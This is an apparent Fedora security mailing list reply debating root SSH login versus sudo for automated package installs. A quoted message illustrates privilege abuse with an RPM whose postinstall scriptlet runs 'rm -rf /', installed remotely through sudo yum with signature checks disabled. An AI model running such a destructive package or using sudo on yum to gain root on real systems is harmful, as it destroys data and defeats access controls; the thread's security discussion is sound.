On Monday 14 January 2008, Eric Rannaud wrote: > On Jan 10, 2008 10:26 PM, Ville Skyttä <ville.skytta@xxxxxx> wrote: > > On Saturday 05 January 2008, Kevin Fenzi wrote: > > > I find root ssh login handy for a number of reasons: > > > > [...] > > > > > - It's nice to be able to do for automated tasks (like say installing a > > > single new package on 20 machines without having to login and sudo on > > > each). > > > > "ssh -t $host sudo yum install $package" works for me... > > What about (supposing I know the password of non-root user 'foo', and > assuming that 'foo' can sudo yum): > > [hacker@tooeasy]$ rpm -q --scripts hacker_pkg.rpm > postinstall scriptlet (using /bin/sh): > rm -rf / > exit 0 > [hacker@tooeasy]$ scp -p hackers_pkg.rpm foo@host: > [hacker@tooeasy]$ ssh -t foo@host sudo yum localinstall --nogpgcheck > ./hackers_pkg.rpm > > Am I wrong in assuming that yum is not necessarily a safe command to > be used with sudo? Not at all. > Or more exactly, that there is no point in blocking > root ssh logins if you're going to let a user that can login remotely > use sudo on yum? Well, I was responding to the "convenience of automation" part, demonstrating that root SSH access is not needed for that, it can be done pretty much as easily with sudo; not to the security aspects per se. But I suppose using an arbitrary username for those tasks instead of root and blocking direct root SSH (with password authentication) could make things somewhat harder for brute forcers. -- Fedora-security-list mailing list Fedora-security-list@xxxxxxxxxx https://www.redhat.com/mailman/listinfo/fedora-security-list
